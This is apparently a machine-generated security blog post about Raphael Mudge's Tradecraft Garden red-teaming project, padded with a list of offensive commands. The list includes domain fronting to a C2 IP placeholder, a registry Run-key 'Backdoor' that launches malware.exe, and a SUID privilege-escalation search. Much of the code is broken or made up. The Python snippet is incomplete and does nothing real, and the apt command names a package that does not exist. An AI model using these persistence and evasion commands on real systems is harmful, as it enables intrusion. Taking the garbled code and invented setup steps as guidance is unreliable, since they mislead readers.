Tradecraft Garden: A New Cybersecurity Project by Raphael Mudge

By /

Listen to this Post

Featured Image
Raphael Mudge, the creator of Armitage and Cobalt Strike, has launched a new cybersecurity project called Tradecraft Garden. This platform focuses on advanced red teaming, adversary simulation, and tradecraft development. Explore it here: Tradecraft Garden.

You Should Know:

1. Setting Up a Red Team Lab

To practice adversary simulation, set up a lab environment using the following commands:

 Create a Kali Linux VM for red teaming 
sudo apt update && sudo apt install -y metasploit-framework cobalt-strike

2. Running Cobalt Strike Team Server

If you have a Cobalt Strike license, start the team server:

./teamserver <your-ip> <password> [/path/to/c2.profile]

3. Automating Tradecraft with Scripts

Use Python to automate post-exploitation tasks:

import requests 
from pwn import

target = "http://victim-ip" 
response = requests.get(target + "/exploit") 
if "vulnerable" in response.text: 
log.success("Target compromised!")

4. Network Evasion Techniques

Bypass network detection using Domain Fronting:

curl --resolve legit-domain.com:443:<C2-IP> https://legit-domain.com/api

5. Windows Persistence Methods

Add a backdoor via registry:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Backdoor" /t REG_SZ /d "C:\malware.exe"

6. Linux Privilege Escalation

Check for SUID misconfigurations:

find / -perm -4000 2>/dev/null

7. Ransomware Defense Drill

Simulate a ransomware attack and practice recovery:

 Backup critical files before an attack 
robocopy C:\Data D:\Backup /MIR /R:1 /W:1

What Undercode Say

Tradecraft Garden is set to become a pivotal resource for red teamers, offering cutting-edge adversary simulation techniques. Expect more integrations with tools like Sliver C2 and Mythic. The platform may also introduce AI-driven attack automation.

Expected Output:

  • A functional red team lab
  • Automated post-exploitation scripts
  • Evasion techniques against EDR/XDR
  • Hands-on ransomware recovery drills

Prediction

Tradecraft Garden will likely introduce AI-assisted red teaming within the next year, blending automation with human expertise for faster, stealthier operations.

(Relevant How Hackers Use AI for Cyber Attacks)

IT/Security Reporter URL:

Reported By: Borja Merino – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: